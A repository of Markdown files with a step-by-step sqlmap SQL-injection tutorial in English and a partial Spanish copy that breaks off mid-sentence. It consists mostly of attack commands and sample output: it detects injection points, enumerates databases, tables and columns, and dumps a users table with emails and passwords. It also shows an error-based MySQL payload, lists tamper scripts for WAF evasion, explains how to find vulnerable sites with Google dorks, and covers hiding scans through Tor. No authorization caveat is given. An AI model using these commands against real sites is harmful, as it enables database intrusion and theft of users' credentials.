├── Inyeccion-sql-automatizada-con-sqlmap-en.md ├── Inyeccion-sql-automatizada-con-sqlmap.md └── README.md /Inyeccion-sql-automatizada-con-sqlmap-en.md: -------------------------------------------------------------------------------- 1 | # Automated sql injections using SQLMAP 2 | 3 | ## TOPICS 4 | 5 | 6 | * [Introduction](#Introduction) 7 | * [What is sqlmap?](#What-is-sqlmap?) 8 | * [Sqlmap install](#sqlmap-install) 9 | * [Basic usage of sqlmap](#Basic-usage-of-sqlmap) 10 | * [GET method](#GET-method) 11 | * [POST method](#POST-method) 12 | * [Basic sql injection step by step](#Basic-sql-injection-step-by-step) 13 | * [Tampers](#Tampers) 14 | * [What is a Tamper](#What-is-a-Tamper) 15 | * [Function of a Tamper](#Function-of-a-Tamper) 16 | * [How to use the tampers?](#How-to-use-the-tampers?) 17 | * [Most-used Tampers](#Most-Used-Tampers) 18 | * [MySQL](#MySQL) 19 | * [MSSQL](#MSSQL) 20 | * [MSAccess](#MSAccess) 21 | * [PostgreSQL](#PostgreSQL) 22 | * [SQLite](#SQLite) 23 | * [Techniques](#Techniques) 24 | * [Boolean-based blind](#Boolean-based-blind) 25 | * [Error-based](#Error-based) 26 | * [Union query-based](#Union-query-based) 27 | * [Stacked queries](#Stacked-queries) 28 | * [Time-based blind](#Time-based-blind) 29 | * [Inline queries](#Inline-queries) 30 | * [Risk and Level](#Risk-y-Level) 31 | * [SQL-SHELL](#SQL-SHELL) 32 | * [SQL-query](#SQL-query) 33 | * [Sqlmap and dorks](#Sqlmap-and-dorks) 34 | * [Anonymous scans with Tor](#Anonymous-scans-with-Tor) 35 | 36 | 37 | ## What is sqlmap? 38 | 39 | SQLMap is a tool to exploit the SQL injection vulnerability. This tool automates the attack in order to exploit the page. 40 | 41 | 42 | ## sqlmap installation 43 | 44 | To begin with I would like to leave the official page here: `http: // sqlmap.org /` 45 | 46 | Sqlmap is a tool that works in python in its versions: 2.6, 2.7 and 3.x on all platforms, so there is no problem to use it, personally I have used it in windows, linux and in termux and it works excellent in all of them. 47 | 48 | The first thing we have to do is have git installed to be able to clone its official repository to our device, the site in git is the following: 49 | 50 | https://github.com/sqlmapproject/sqlmap.git 51 | 52 | to clone it we use the following: 53 | 54 | git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev 55 | 56 | Once we have cloned the repository, we go to the `sqlmap-dev` folder and execute the` sqlmap.py` file: 57 | 58 | `python sqlmap.py` 59 | 60 | 61 | ## Basic use of sqlmap 62 | 63 | To see the help options for this tool, just use the following: 64 | 65 | `sqlmap.py -h` 66 | 67 | What will return the basic options to make a correct use of this tool, something that must be understood well is the correct order of execution to add the options: 68 | 69 | `sqlmap.py --option -u URL` 70 | 71 | Something we have to keep in mind is that this tool allows us to make scans from the GET and POST method: 72 | 73 | ### GET method 74 | 75 | Sqlmap automatically uses the GET method to work, the syntax is as follows: 76 | 77 | `sqlmap.py -u" http://www.examplepage.com/something.php?id=1&id2=1&id3=1 "` 78 | 79 | Something very important to keep in mind is that sqlmap scans the page parameter by parameter, this means that if we have a page with more than one parameter we have to specify the parameter that we want to analyze or scan all one by one. 80 | 81 | ### POST method 82 | 83 | To use the POST method we have to tell the tool that we will use this method, for that we use: 84 | 85 | `--method POST` 86 | 87 | After declaring that we will use the post method we have to declare the parameters that we are going to analyze, for that we use: 88 | 89 | `--data` 90 | 91 | Example: 92 | 93 | `sqlmap.py -u" http://www.examplepage.com/something.php "- method POST --data" id = 1 & id2 = 1 & id3 = 1 "` 94 | 95 | After being clear about the methods with which we can do the scan, we have to know the basic and general options to do a basic scan. 96 | 97 | In the options we can highlight the most general and important, for example: 98 | 99 | ``` 100 | | -p parameter | It is used to determine the parameter that we want to analyze | 101 | 102 | | --current-user | We extract the username with which we interact with the database | 103 | 104 | | --current-db | It extracts the name of the database in which we are | 105 | 106 | | --dbs | It will give us the number of databases and will show us the name of each of them | 107 | 108 | | -D name | It allows us to enter the selected database | 109 | 110 | | --tables | It will show us the number of tables within a database and the names of each of the tables | 111 | 112 | | -T name | It allows us to enter the selected table | 113 | 114 | | --column | It will extract the number of the columns within a table and show us the name of each of them | 115 | 116 | | -C name | It allows us to select the column | 117 | 118 | | --dump | It allows us to extract content from the database | 119 | 120 | | --dump-all | It extracts everything from the database | 121 | 122 | 123 | ``` 124 | 125 | Once we know the basic options of the tool, we will see an example of how to use it: 126 | 127 | ## Basic sql injection step by step 128 | 129 | For this example we will simulate that we have a vulnerable page by the GET method, we will use the following url: 130 | 131 | `sqlmap.py -u" http://www.examplepage.com/something.php?id=1&id2=1&id3=1 "` 132 | 133 | When you start the scan, it is divided into parts: 134 | 135 | It will scan the connection to the page. 136 | It will scan the page for any WAF or IPS: 137 | 138 | `[INFO] checking if the target is protected by some kind of WAF / IPS` 139 | 140 | At the end of the scan, something like this will appear: 141 | ``` 142 | [*] starting at 12:10:33 143 | 144 | [12:10:33] [INFO] resuming back-end DBMS 'mysql' 145 | [12:10:34] [INFO] testing connection to the target url 146 | sqlmap identified the following injection points with a total of 0 HTTP(s) requests: 147 | --- 148 | Place: GET 149 | Parameter: id 150 | Type: error-based 151 | Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause 152 | Payload: id=3 AND (SELECT 1489 FROM(SELECT COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0 END)),0x3a7a76653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) 153 | --- 154 | [12:10:37] [INFO] the back-end DBMS is MySQL 155 | web server operating system: FreeBSD 156 | web application technology: Apache 2.2.22 157 | back-end DBMS: MySQL 5 158 | 159 | ``` 160 | This means that the scan is finished, that the page is vulnerable and that we managed to attack it successfully. The next thing is to extract the name of the database, to extract the name of the databases we are going to use the `--dbs` option: 161 | 162 | `sqlmap.py -u" http://www.examplepage.com/something.php?id=1&id2=1&id3=1 "--dbs` 163 | 164 | When we finish we will have the names of the databases, something like this: 165 | 166 | ``` 167 | [*] starting at 12:12:56 168 | 169 | [12:12:56] [INFO] resuming back-end DBMS 'mysql' 170 | [12:12:57] [INFO] testing connection to the target url 171 | sqlmap identified the following injection points with a total of 0 HTTP(s) requests: 172 | --- 173 | Place: GET 174 | Parameter: id 175 | Type: error-based 176 | Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause 177 | Payload: id3=1 AND (SELECT 1489 FROM(SELECT COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0 END)),0x3a7a76653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) 178 | --- 179 | [12:13:00] [INFO] the back-end DBMS is MySQL 180 | web server operating system: FreeBSD 181 | web application technology: Apache 2.2.22 182 | back-end DBMS: MySQL 5 183 | [12:13:00] [INFO] fetching database names 184 | [12:13:00] [INFO] the SQL query used returns 2 entries 185 | [12:13:00] [INFO] resumed: information_schema 186 | [12:13:00] [INFO] resumed: nombre_DB 187 | available databases [2]: 188 | [*] information_schema 189 | [*] nombre_DB 190 | ``` 191 | 192 | With this we have the databases, in this example we have `2`: 193 | 194 | ``` 195 | [*] information_schema 196 | [*] nombre_DB 197 | ``` 198 | 199 | Now, we are going to enter the database `DB_name` and extract the name of the tables: 200 | 201 | `sqlmap.py -u "http://www.paginaparaejemplo.com/algo.php?id=1&id2=1&id3=1" -D nombre_DB --tables` 202 | 203 | At the end of the scan we have something like this: 204 | 205 | ``` 206 | [11:55:18] [INFO] the back-end DBMS is MySQL 207 | web server operating system: FreeBSD 208 | web application technology: Apache 2.2.22 209 | back-end DBMS: MySQL 5 210 | [11:55:18] [INFO] fetching tables for database: 'nombre_DB' 211 | [11:55:19] [INFO] heuristics detected web page charset 'ascii' 212 | [11:55:19] [INFO] the SQL query used returns 3 entries 213 | [11:55:20] [INFO] retrieved: users 214 | [11:55:21] [INFO] retrieved: another_table 215 | [11:55:21] [INFO] retrieved: hello_am_another_table 216 | ``` 217 | 218 | At the end we have the following tables: 219 | 220 | `users, another_table, hello_am_another_table` 221 | 222 | The next thing is to select a table and extract the columns within it: 223 | 224 | `sqlmap.py -u" http://www.examplepage.com/something.php?id=1&id2=1&id3=1 "-D DB_name -T users --columns` 225 | 226 | At the end we have something like this: 227 | 228 | ``` 229 | [12:17:39] [INFO] the back-end DBMS is MySQL 230 | web server operating system: FreeBSD 231 | web application technology: Apache 2.2.22 232 | back-end DBMS: MySQL 5 233 | [12:17:39] [INFO] fetching columns for table 'users' in database 'safecosmetics' 234 | [12:17:41] [INFO] heuristics detected web page charset 'ascii' 235 | [12:17:41] [INFO] the SQL query used returns 4 entries 236 | [12:17:42] [INFO] retrieved: id 237 | [12:17:43] [INFO] retrieved: int(11) 238 | [12:17:45] [INFO] retrieved: name 239 | [12:17:46] [INFO] retrieved: text 240 | [12:17:47] [INFO] retrieved: passwd 241 | [12:17:48] [INFO] retrieved: text 242 | 243 | ....... 244 | 245 | [12:17:59] [INFO] retrieved: hash 246 | [12:18:01] [INFO] retrieved: varchar(128) 247 | Database: nombre_DB 248 | Table: users 249 | [8 columns] 250 | +-------------------+--------------+ 251 | | Column | Type | 252 | +-------------------+--------------+ 253 | | email | text | 254 | | id | int(11) | 255 | | name | text | 256 | | passwd | text | 257 | +-------------------+--------------+ 258 | ``` 259 | 260 | We have the following columns: 261 | 262 | `id, name, email, passwd` 263 | 264 | Finally we have to extract the content of those columns: 265 | 266 | `sqlmap.py -u" http://www.examplepage.com/something.php?id=1&id2=1&id3=1 "-D DB_name -T users -C id, name, email, passwd --dump` 267 | 268 | At the end we have something like this: 269 | 270 | ``` 271 | + ---- + ---------- + --------------------- + ------------------- + 272 | | id | name | email | password | 273 | + ---- + ---------- + --------------------- + ------------------- + 274 | | 0 | pepito | pepito@correo.com | secure password | 275 | + ---- + ---------- + --------------------- + ------------------- + 276 | 277 | ``` 278 | 279 | With this we have already extracted the information that is inside the columns. 280 | 281 | 282 | Once we have seen the basic use for the use of this tool we go to the next step, in the previous example we used as a sample an invented page where everything worked from the first, but being realistic that does not always happen, we will always find with more "complicated" websites and it is from this point where it becomes more interesting. let's see the use of TAMPERS 283 | 284 | Other important options that we are going to see are: 285 | 286 | ``` 287 | | --random-agent | Which allows us to "change" the user agent with which the queries are executed | 288 | 289 | | --proxy = proxy | Which allows us to connect to the page we want to scan through a proxy | 290 | 291 | | --level = 1-5 | This allows us to modify the level with which we want to make the scan, by default it is in level 1 but we can change it to 5 to make the scan more intrisive | 292 | 293 | | --risk = 1-3 | In the same way as --level, risk allows us to change the level with which we want to do the scan, adding more aggressiveness but at the same time making more noise, this can be configured from 1 to 3, coming by default at number 1 | 294 | 295 | ``` 296 | 297 | ## TAMPERS 298 | 299 | ### What is a Tamper 300 | 301 | A tamper is a python file that gives us the option to "camouflage" the payloads used by the sqlmap tool in order to "bypass" some WAF. 302 | 303 | Sqlmap has a wide variety of Tampers to help the sql injection to be fulfilled, each Tamper has its function and its compatibility, in some cases these can be mixed for a better result. 304 | 305 | We can see the complete list of tampers inside the sqlmap repo 306 | 307 | `https: // github.com / sqlmapproject / sqlmap / tree / master / tamper` 308 | 309 | ### Function of a Tamper 310 | 311 | Each tamper has its own functionality, in this case we are going to see just a few examples to see how the tampers are designed and see how they work. 312 | 313 | as an example we will analyze the tamper: randomcomments 314 | 315 | `https: // github.com / sqlmapproject / sqlmap / blob / master / tamper / randomcomments.py` 316 | 317 | we can see its function in a part of its code: 318 | 319 | ``` 320 | import re 321 | 322 | from lib.core.common import randomRange 323 | from lib.core.compat import xrange 324 | from lib.core.data import kb 325 | from lib.core.enums import PRIORITY 326 | 327 | __priority__ = PRIORITY.LOW 328 | 329 | def tamper(payload, **kwargs): 330 | """ 331 | Add random inline comments inside SQL keywords (e.g. SELECT -> S/**/E/**/LECT) 332 | >>> import random 333 | >>> random.seed(0) 334 | >>> tamper('INSERT') 335 | 'I/**/NS/**/ERT' 336 | """ 337 | ``` 338 | Basically what it does is add comments on the words used in the payload, example: 339 | 340 | ``` 341 | SELECT -> S/**/E/**/LECT 342 | 343 | UNION -> UN/**/I/**/ON 344 | ``` 345 | 346 | ### How to use tampers? 347 | 348 | To make use of a tamper or several tampers in the scanning of a website we have to specify it with the following option: 349 | 350 | `--tamper =" tampername "` 351 | 352 | If we want to use more than one tamper we only have to use one, to separate them: 353 | 354 | `--tamper =" tampername1, tampername2, tampername3, etc "` 355 | 356 | So, we have the following line with the added tampers: 357 | 358 | `sqlmap.py -u" http://www.examplepage.com/something.php?id=1&id2=1&id3=1 "--tamper =" tampername1, tampername2, tampername3, etc "` 359 | 360 | 361 | ### Most used tampers 362 | 363 | In order to classify the most used tampers we must first separate the tampers to organize them, as I mentioned before, each tamper is different and each one is used for different things, so we are going to separate the tampers by databases where they work: 364 | 365 | We have the following: 366 | 367 | #### MySQL 368 | 369 | ``` 370 | space2randomblank 371 | unionalltounion 372 | unmagicquotes 373 | versionedkeywords 374 | versionedmorekeywords 375 | xforwardedforbetween 376 | bluecoat 377 | charencode 378 | charunicodeencode 379 | concat2concatws 380 | equaltolike 381 | greatest 382 | halfversionedmorekeywords 383 | ifnull2ifisnull 384 | space2morehash 385 | space2mysqldash 386 | space2plus 387 | modsecurityversioned 388 | modsecurityzeroversioned 389 | multiplespaces 390 | securesphere 391 | space2comment 392 | space2hash 393 | nonrecursivereplacement 394 | percentage 395 | randomcase 396 | 397 | ``` 398 | 399 | #### MSSQL 400 | 401 | ``` 402 | sp_password 403 | space2comment 404 | space2dash 405 | space2mssqlblank 406 | space2mysqldash 407 | space2plus 408 | space2randomblank 409 | charencode 410 | charunicodeencode 411 | equaltolike 412 | greatest 413 | unionalltounion 414 | unmagicquotes 415 | multiplespaces 416 | nonrecursivereplacement 417 | percentage 418 | randomcase 419 | securesphere 420 | 421 | ``` 422 | 423 | #### MSAccess 424 | 425 | ``` 426 | modsecurityversioned 427 | modsecurityzeroversioned 428 | equaltolike 429 | greatest 430 | halfversionedmorekeywords 431 | nonrecursivereplacement 432 | percentage 433 | randomcase 434 | securesphere 435 | between 436 | bluecoat 437 | charencode 438 | charunicodeencode 439 | concat2concatws 440 | space2comment 441 | space2hash 442 | space2morehash 443 | space2mysqldash 444 | space2plus 445 | space2randomblank 446 | unionalltounion 447 | unmagicquotes 448 | versionedkeywords 449 | versionedmorekeywords 450 | ifnull2ifisnull 451 | multiplespaces 452 | 453 | ``` 454 | 455 | #### PostgreSQL 456 | 457 | ``` 458 | xforwardedfor 459 | space2comment 460 | space2plus 461 | space2randomblank 462 | between 463 | charencode 464 | charunicodeencode 465 | equaltolike 466 | greatest 467 | multiplespaces 468 | nonrecursivereplacement 469 | percentage 470 | randomcase 471 | securesphere 472 | between 473 | 474 | ``` 475 | 476 | #### SQLite 477 | 478 | ``` 479 | space2plus 480 | unionalltounion 481 | unmagicquotes 482 | xforwardedfor 483 | ifnull2ifisnull 484 | randomcase 485 | securesphere 486 | space2comment 487 | space2dashmmultiplespaces 488 | nonrecursivereplacement 489 | 490 | ``` 491 | ### Techniques 492 | 493 | Another important point is to know the techniques that this tool uses. 494 | 495 | As we know, sqlmap uses many types of payloads which are classified into 6 parts, which are: 496 | 497 | ``` 498 | B: Boolean-based blind 499 | E: Error-based 500 | U: Union query-based 501 | S: Stacked queries 502 | T: Time-based blind 503 | Q: Inline queries 504 | 505 | ``` 506 | #### Boolean-based blind 507 | 508 | Boolean-based blind means that the vulnerability is based on Boolean values ​​(true or false) and is said to be blind because it does not show any sign that there is an error on the page. 509 | 510 | #### Error-based 511 | 512 | Error-based means that the injection is based on the error messages that the server responds and thus knows a little more about the structure of the database that is being used. 513 | 514 | #### Union query-based 515 | 516 | Union query-based means that we are taking advantage of the fact that the UNION operator from sql can be used, thanks to this we can combine statements that will be displayed as part of the server's response. 517 | 518 | #### Stacked queries 519 | 520 | Stacked queries means that the vulnerability is based on adding more sql queries in series, in this way sending a normal query and at the same time sending the attacker's query, all this only dividing the queries with a ";". 521 | 522 | #### Time-based blind 523 | 524 | Time-based blind is when the vulnerability is time-based, which means that an attacker will send an sql query forcing the database to wait a certain amount of time, if the server response time is the same time as the attacker stated in the sentence, this means that he is vulnerable. 525 | 526 | #### Inline queries 527 | 528 | Inline queries consists of joining one sql query inside another and so on to see if the statement is executed. 529 | 530 | Now that we know which techniques and what type of error each one focuses on, let's see how to use them. 531 | 532 | 533 | To use any technique within the scan we have to declare the following option: 534 | 535 | `` 536 | --technique = TECH SQL injection techniques to use (default "BEUSTQ") 537 | `` 538 | Sqlmap by default uses all the techniques at the same time, which is the same as: 539 | 540 | `` 541 | --technique = BEUSTQ 542 | `` 543 | 544 | This is very good, since the tool makes our work much easier but at the same time this makes the scan take longer as it scans for all errors to detect it. Before doing a scan we have to try to collect as much information as possible to make the scan easier and save more time, such as detecting what error we are seeing and thus declaring what type of error we want to exploit using a technique for that specific type of error, thanks to this we tell the tool to focus only on that type of error and make the scan faster and more direct. 545 | 546 | for example: 547 | 548 | `sqlmap.py -u" http://www.examplepage.com/something.php?id=1&id2=1&id3=1 "--technique = B``sqlmap.py -u "http://www.paginaparaejemplo.com/algo.php?id=1&id2=1&id3=1" --technique=B` 549 | 550 | 551 | ### Risk and Level 552 | 553 | Another very important thing is to know the "Risk" and Level ": 554 | 555 | Risk: risk of an error occurring. The payloads that have the least risk are those of risk 1, and those that have the most risk 2. 556 | 557 | Level: number of requests per payload. Level 1 makes few requests while level 5 makes many. 558 | 559 | ### SQL-shell 560 | 561 | the `--sql-shell` option loads us a SQL shell from which we can work 562 | 563 | Example: 564 | 565 | `sqlmap.py -u" http://www.examplepage.com/something.php?id=1&id2=1&id3=1 "--sql-shell` 566 | 567 | ### SQL-query 568 | 569 | the `--sql-query` option 570 | 571 | #### Sqlmap and dorks 572 | 573 | Sqlmap also allows us to do a search through google dorks to find vulnerable pages, this is done with the following sequence: 574 | 575 | 576 | `sqlmap.py -g DORK` 577 | 578 | example: 579 | 580 | `sqlmap.py -g" inurl: \ ". php? id = 1 \" "` 581 | 582 | 583 | ### Anonymous scans with Tor 584 | 585 | One of the most important parts when doing a job in the area of ​​computer security is knowing how to take care of yourself a little, for that is anonymity is essential, in this case we are going to use TOR to filter the requests. 586 | 587 | `sqlmap.py --tor --tor-type = SOCKS5 --check-tor -u" http://www.examplepage.com/something.php?id=1&id2=1&id3=1 "` 588 | 589 | 590 | To finish I would like to thank you for dedicating a little of your time to this writing, if you like you can share it. 591 | -------------------------------------------------------------------------------- /Inyeccion-sql-automatizada-con-sqlmap.md: -------------------------------------------------------------------------------- 1 | # Inyecciónes sql automatizadas usando SQLMAP 2 | 3 | ## TEMAS 4 | 5 | 6 | * [Introducción](#Introducción) 7 | * [¿Qué es sqlmap?](#¿Qué-es-sqlmap?) 8 | * [Instalación de sqlmap](#Instalación-de-sqlmap) 9 | * [Uso básico de sqlmap](#Uso-básico-de-sqlmap) 10 | * [Método GET](#Método-GET) 11 | * [Método POST](#Método-POST) 12 | * [Inyección sql básica paso a paso](#Inyección-sql-básica-paso-a-paso) 13 | * [Tampers](#Tampers) 14 | * [Qué es un Tamper](#Qué-es-un-Tamper) 15 | * [Funcion de un Tamper](#Funcion-de-un-Tamper) 16 | * [¿Cómo usar los tampers?](#¿Cómo-usar-los-tampers?) 17 | * [Tampers mas usados](#Tampers-mas-usados) 18 | * [MySQL](#MySQL) 19 | * [MSSQL](#MSSQL) 20 | * [MSAccess](#MSAccess) 21 | * [PostgreSQL](#PostgreSQL) 22 | * [SQLite](#SQLite) 23 | * [Techniques](#Techniques) 24 | * [Boolean-based blind](#Boolean-based-blind) 25 | * [Error-based](#Error-based) 26 | * [Union query-based](#Union-query-based) 27 | * [Stacked queries](#Stacked-queries) 28 | * [Time-based blind](#Time-based-blind) 29 | * [Inline queries](#Inline-queries) 30 | * [Risk y Level](#Risk-y-Level) 31 | * [SQL-SHELL](#SQL-SHELL) 32 | * [SQL-query](#SQL-query) 33 | * [Sqlmap y dorks](#Sqlmap-y-dorks) 34 | * [Escaneos anonimos con Tor](#Escaneos-anonimos-con-Tor) 35 | 36 | 37 | ## ¿Qué es sqlmap? 38 | 39 | SQLMap es una herramienta para explotar la vulnerabilidad de SQL injection. Esta herramienta automatiza el ataque para así explotar la página. 40 | 41 | 42 | ## Instalación de sqlmap 43 | 44 | Para empezar me gustaría dejar la página oficial aquí: `http://sqlmap.org/` 45 | 46 | Sqlmap es una herramienta que funciona en python en sus versiones: 2.6, 2.7 y 3.x en todas las plataformas, así que no hay problema para usarlo, personalmente lo he usado en windows, linux y en termux y en todas funciona exelente. 47 | 48 | Lo primero que tenemos que hacer es tener instalado git para poder clonar su repositorio oficial a nuestro dispositivo, el sitio en git es el siguiente: 49 | 50 | https://github.com/sqlmapproject/sqlmap.git 51 | 52 | para clonarlo usamos lo siguiente: 53 | 54 | git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev 55 | 56 | una vez que tengamos clonado el repositorio entramos a la carpeta `sqlmap-dev` y ejecutamos el archivo `sqlmap.py`: 57 | 58 | `python sqlmap.py` 59 | 60 | 61 | ## Uso básico de sqlmap 62 | 63 | Para ver las opciones de ayuda de esta herramienta basta con usar lo siguiente: 64 | 65 | `sqlmap.py -h` 66 | 67 | Lo que nos devolvera las opciones basicas para hacer un correcto uso de esta herramienta, algo que se tiene que entender bien es el correcto orden de ejecuion para agregar las opciones: 68 | 69 | `sqlmap.py --opcion -u URL` 70 | 71 | Algo que tenemos que tener en cuenta es que esta herramienta nos permite hacer escaneos desde el método GET y POST: 72 | 73 | ### Método GET 74 | 75 | Sqlmap automaticamente usa el metodo GET para trabajar, la sintaxis nos queda de la siguiente manera: 76 | 77 | `sqlmap.py -u "http://www.paginaparaejemplo.com/algo.php?id=1&id2=1&id3=1"` 78 | 79 | Algo muy importante a tener en cuenta es que sqlmap escanea la página parametro por paramerto, esto significa que si tenemos una página con mas de un parámetro tenemos que especificar el parámetro que queremos analizar o escanear todos uno a uno. 80 | 81 | 82 | ### Método POST 83 | 84 | Para usar el método POST tenemos que decirle a la herramienta que utilizarémos este método, para eso usamos: 85 | 86 | `--method POST` 87 | 88 | Despues de declarar que usarémos el método post tenemos que declarar los parametros que vamos a analizar, para eso usamos: 89 | 90 | `--data` 91 | 92 | Ejemplo: 93 | 94 | `sqlmap.py -u "http://www.paginaparaejemplo.com/algo.php" --method POST --data "id=1&id2=1&id3=1"` 95 | 96 | Después de tener claro los métodos con los cuales podemos hacer el escaneo, tenemos que conocer las opciones basicas y generales para hacer un escaneo basico. 97 | 98 | En las opciones podemos resaltar las mas generales e importantes, por ejemplo: 99 | 100 | ``` 101 | | -p parametro | Se utiliza para determinar el parametro que queremos analizar | 102 | 103 | | --current-user | Nos extrar el nombre de usuario con el que interactuamos con la base de datos | 104 | 105 | | --current-db | Nos extrae el nombre de la base de datos en la cual estamos | 106 | 107 | | --dbs | Nos extrerá el numero de bases de datos y nos mostrará el nombre de cada una de ellas | 108 | 109 | | -D nombre | Nos permite entrar en la base de datos seleccionada | 110 | 111 | | --tables | Nos mostrará el numero de tablas dentro de una base de datos y los nombres de cada una de las tablas | 112 | 113 | | -T nombre | Nos permite entrar en la tabla seleccionada | 114 | 115 | | --column | Nos extraerá el número de las columnas dentro de una tabla y nos mostrara el nombre de cada una de ellas | 116 | 117 | | -C nombre | Nos permite seleccionar la columna | 118 | 119 | | --dump | Nos permite extraer contenido de la base de datos | 120 | 121 | | --dump-all | Nos extrae todo de la base de datos | 122 | 123 | 124 | ``` 125 | 126 | Una vez que ya conocemos las opciones basicas de la herramienta vamos a ver un ejemplo de como usarla: 127 | 128 | ## Inyección sql básica paso a paso 129 | 130 | Para este ejemplo simularemos que tenemos una página vulnerable por el método GET, usarémos la siguiente url: 131 | 132 | `sqlmap.py -u "http://www.paginaparaejemplo.com/algo.php?id=1&id2=1&id3=1"` 133 | 134 | Al empezar el escaneo, este de divide en partes: 135 | 136 | Escaneará la coneccion con la página. 137 | Escaneará la página en busca de algun WAF o IPS: 138 | 139 | ` [INFO] checking if the target is protected by some kind of WAF/IPS` 140 | 141 | Al terminar el escaneo, nos aparecera algo como esto: 142 | 143 | ``` 144 | [*] starting at 12:10:33 145 | 146 | [12:10:33] [INFO] resuming back-end DBMS 'mysql' 147 | [12:10:34] [INFO] testing connection to the target url 148 | sqlmap identified the following injection points with a total of 0 HTTP(s) requests: 149 | --- 150 | Place: GET 151 | Parameter: id 152 | Type: error-based 153 | Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause 154 | Payload: id=3 AND (SELECT 1489 FROM(SELECT COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0 END)),0x3a7a76653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) 155 | --- 156 | [12:10:37] [INFO] the back-end DBMS is MySQL 157 | web server operating system: FreeBSD 158 | web application technology: Apache 2.2.22 159 | back-end DBMS: MySQL 5 160 | 161 | ``` 162 | Esto significa que ya ha terminado el escaneo, que la página es vulnerable y que conseguimos atacarla con exito. Lo siguiente es extraer el nombre de la base de datos, para extraer el nombre de las bases de datos vamos a usar la opcion `--dbs`: 163 | 164 | `sqlmap.py -u "http://www.paginaparaejemplo.com/algo.php?id=1&id2=1&id3=1" --dbs` 165 | 166 | Al terminar vamos a tener los nombres de las bases de datos, algo como esto: 167 | 168 | ``` 169 | [*] starting at 12:12:56 170 | 171 | [12:12:56] [INFO] resuming back-end DBMS 'mysql' 172 | [12:12:57] [INFO] testing connection to the target url 173 | sqlmap identified the following injection points with a total of 0 HTTP(s) requests: 174 | --- 175 | Place: GET 176 | Parameter: id 177 | Type: error-based 178 | Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause 179 | Payload: id3=1 AND (SELECT 1489 FROM(SELECT COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0 END)),0x3a7a76653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) 180 | --- 181 | [12:13:00] [INFO] the back-end DBMS is MySQL 182 | web server operating system: FreeBSD 183 | web application technology: Apache 2.2.22 184 | back-end DBMS: MySQL 5 185 | [12:13:00] [INFO] fetching database names 186 | [12:13:00] [INFO] the SQL query used returns 2 entries 187 | [12:13:00] [INFO] resumed: information_schema 188 | [12:13:00] [INFO] resumed: nombre_DB 189 | available databases [2]: 190 | [*] information_schema 191 | [*] nombre_DB 192 | ``` 193 | 194 | Con esto tenemos las bases de datos, en este ejemplo tenemos `2`: 195 | 196 | ``` 197 | [*] information_schema 198 | [*] nombre_DB 199 | ``` 200 | 201 | Ahora, vamos a entrar a la base de datos `nombre_DB` y estraerémos el nombre de las tablas: 202 | 203 | `sqlmap.py -u "http://www.paginaparaejemplo.com/algo.php?id=1&id2=1&id3=1" -D nombre_DB --tables` 204 | 205 | Al terminar el escaneo tenemos algo como esto: 206 | 207 | ``` 208 | [11:55:18] [INFO] the back-end DBMS is MySQL 209 | web server operating system: FreeBSD 210 | web application technology: Apache 2.2.22 211 | back-end DBMS: MySQL 5 212 | [11:55:18] [INFO] fetching tables for database: 'nombre_DB' 213 | [11:55:19] [INFO] heuristics detected web page charset 'ascii' 214 | [11:55:19] [INFO] the SQL query used returns 3 entries 215 | [11:55:20] [INFO] retrieved: usuarios 216 | [11:55:21] [INFO] retrieved: otra_tabla 217 | [11:55:21] [INFO] retrieved: hola_soy_otra_tabla 218 | ``` 219 | 220 | Al terminar tenemos las siguientes tablas: 221 | 222 | `usuarios, otra_tabla, hola_soy_otra_tabla` 223 | 224 | Lo siguiente es seleccionar una tabla y extraer las columnas dentro de ella: 225 | 226 | `sqlmap.py -u "http://www.paginaparaejemplo.com/algo.php?id=1&id2=1&id3=1" -D nombre_DB -T usuarios --columns` 227 | 228 | Al terminar tenemos algo como esto: 229 | 230 | ``` 231 | [12:17:39] [INFO] the back-end DBMS is MySQL 232 | web server operating system: FreeBSD 233 | web application technology: Apache 2.2.22 234 | back-end DBMS: MySQL 5 235 | [12:17:39] [INFO] fetching columns for table 'users' in database 'safecosmetics' 236 | [12:17:41] [INFO] heuristics detected web page charset 'ascii' 237 | [12:17:41] [INFO] the SQL query used returns 4 entries 238 | [12:17:42] [INFO] retrieved: id 239 | [12:17:43] [INFO] retrieved: int(11) 240 | [12:17:45] [INFO] retrieved: name 241 | [12:17:46] [INFO] retrieved: text 242 | [12:17:47] [INFO] retrieved: passwd 243 | [12:17:48] [INFO] retrieved: text 244 | 245 | ....... 246 | 247 | [12:17:59] [INFO] retrieved: hash 248 | [12:18:01] [INFO] retrieved: varchar(128) 249 | Database: nombre_DB 250 | Table: users 251 | [8 columns] 252 | +-------------------+--------------+ 253 | | Column | Type | 254 | +-------------------+--------------+ 255 | | email | text | 256 | | id | int(11) | 257 | | name | text | 258 | | passwd | text | 259 | +-------------------+--------------+ 260 | ``` 261 | 262 | Tenemos las siguientes columnas: 263 | 264 | `id, name, email, passwd` 265 | 266 | Por último tenemos que extraer el contenido de esas columnas: 267 | 268 | `sqlmap.py -u "http://www.paginaparaejemplo.com/algo.php?id=1&id2=1&id3=1" -D nombre_DB -T usuarios -C id,name,email,passwd --dump ` 269 | 270 | Al terminar tenemos algo como esto: 271 | 272 | ``` 273 | +----+----------+---------------------+-------------------+ 274 | | id | name | email | password | 275 | +----+----------+---------------------+-------------------+ 276 | | 0 | pepito | pepito@correo.com | contraseñasegura | 277 | +----+----------+---------------------+-------------------+ 278 | 279 | ``` 280 | 281 | Con esto ya tenemos extraida la informacion que hay dentro de las columnas. 282 | 283 | 284 | Una 